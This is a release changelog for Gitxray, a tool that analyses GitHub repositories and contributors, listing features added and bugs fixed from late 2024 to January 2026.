1.0.20

Release v1.0.20 (January 9th, 2026)

• Added commit co-author analysis feature that parses Co-authored-by: trailers in commit messages to collect more emails. We also check if those co-authors are shared between commits of different accounts.
• Added a pattern analysis to detect automated/bot activity (we warn if there are commits across more than 22 of the hours of the day), identify commits during work hours vs outside work hours (weekday/weekend patterns), infer timezones from 190+ countries/cities worldwide, convert UTC commit hours to local time for timezone-aware analysis that flags night-time activity or location mismatches, and finally we also identify coordinated timing across accounts.
• Fixed duplicate entries in HTML report highlights section by deduplicating warnings before rendering.
• Fixed similar repository name search to use exact name matching instead of partial/fuzzy search, and corrected API sort parameters from 's'/'o' to 'sort'/'order' to properly sort by stars, preventing false warnings about repository rating.
• Fixed typo in contributors_xray.py where pgp_pulicKeyAlgorithm should have been pgp_publicKeyAlgorithm, preventing PGP public key algorithms from being collected from signature attributes.
• Fixed timezone handling in gh_time.py to ensure all parsed GitHub timestamps are timezone-aware (UTC), preventing "can't subtract offset-naive and offset-aware datetimes" errors.
• Fixed workflow run count calculation in workflows_xray.py where contributor/non-contributor run counts were incremented by 1 instead of the actual number of runs, causing incorrect totals in summary output.
• Fixed case sensitivity bug in workflows_xray.py where check for ACTIONS_ALLOW_UNSECURE_COMMANDS was uppercase but content was lowercased, causing the check to never match.
• Fixed type inconsistency in contributors_xray.py where primary key email dict objects were appended to contributor_emails list instead of email strings, breaking duplicate detection and anonymous user matching.

1.0.19

Release v1.0.19 (December 6th, 2025)

• Fix by ThemeHackers merged; slight change to fix a TypeError in gh_public_events for missing commits (Thank you!!)
• Fix to missing commits when filtering by author for very specific cases. The GitHub REST API behaves strangely and sometimes filtering by author only works if its an email.
• Added, in addition to the existing checks of Commit date vs. Account creation time, a check against the Repository creation time which also issues a highlighted WARNING.

1.0.18

Release v1.0.18 (August 20th, 2025)

• New 'host_refs' section/feature! Uses the GitHub Code search API to search for http(s) hosts (domains or IP addresses). It also searches inside Workflows. It can definitely help at the time of mapping infrastructure of a target, or for checking your own repositories for potential malicious activity. Only works if a GH_ACCESS_TOKEN is set, due to Code search API restrictions.
• New integration with the VirusTotal API, which can be activated by setting VT_API_KEY to your VirusTotal API Key! It will populate results in a new 'host_refs_vt' section for any hosts that were previously identified in host_refs.
• Merged the 'urls' section for contributors and repository with 'profiling' - only kept it for non-contributors.
• Fixed the sidebar menu in the HTML report so that the first click collapses a collapsable item directly; and also fixed indentation for subitems.
• Added an inline description to categories in the HTML report explaining why and how the data of the category can be useful.

1.0.17.4

Release v1.0.17.4 (April 27th, 2025)

• Removed external links to Bootstrap CSS, JavaScript, and the Gitxray logo; now all assets (styles, scripts, images) are embedded so HTML reports are fully self-contained.
• Merged a PR by satoridev01 which prevents Gitxray from printing stars, watchers, created, updated, contributors and anonymous if they were not found, as opposed to stating "0".

1.0.17.3

Release v1.0.17.3 (March 2nd, 2025)

• Added handling of Blocked repositories. The GitHub API presents a different error than for not-found repos, and includes a reason; which we now include in our reports. Thanks to satoridev01 for reporting the behavior.

1.0.17.2

Release v1.0.17.2 (February 16th, 2025)

• Added a Highlighted findings section to the HTML report. Special thanks to Viktor and Darin from DevOps Paradox for their feedback.
• Added to every table in the HTML report the ability to collapse and expand.
• Merged the finding on similar repository names with the finding on the repository being the most starred.
• Improved the introduction section of the HTML report to guide users with sample use-cases for Gitxray.

1.0.17.1

Release v1.0.17.1 (January 30th, 2025)

• Fixed parsing of legacy workflows which include an empty path attribute.
• Fixed parsing of broken armored PGP keys which appear to be accepted by GitHub when being added to a user's profile.

1.0.17

Release v1.0.17 (January 26th, 2025)

• Added a new "--shush" parameter which turns "shushable" mode on, discarding any progress output from stdout.
• Added a new finding under the "personal" category which tells if the contributor has enabled "Available for hire" in their profile (docs describe it here: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-personal-account-on-github/managing-user-account-settings/about-available-for-hire)
• Added a "WARNING" label/prefix on a couple of Workflow findings which deserve an extra highlight.
• Turned gh_api into a class named GitHubRESTAPI which stores a reference to gx_output.
• Added a new stdout method in gx_output to act as a proxy for print() calls, discarding "shushable" output.

1.0.16.5

Release v1.0.16.5 (January 18th, 2025)

• Fixed an error case (an unhandled exception) that showed up when scanning repositories with a very large list of contributors (e.g. torvalds/linux, or MicrosoftDocs/azure-docs), which leads to GitHub REST APIs responding in an undocumented manner, stating that: "The history or contributor list is too large to list contributors for this repository via the API".

1.0.16.4

Release v1.0.16.4 (October 30th, 2024)

• Fixed an error case that should be fixed in gh_api.py eventually: GitHub returning unexpected error responses when querying for certain releases while being unauthenticated. Thank you once again fearcito for your input and testing.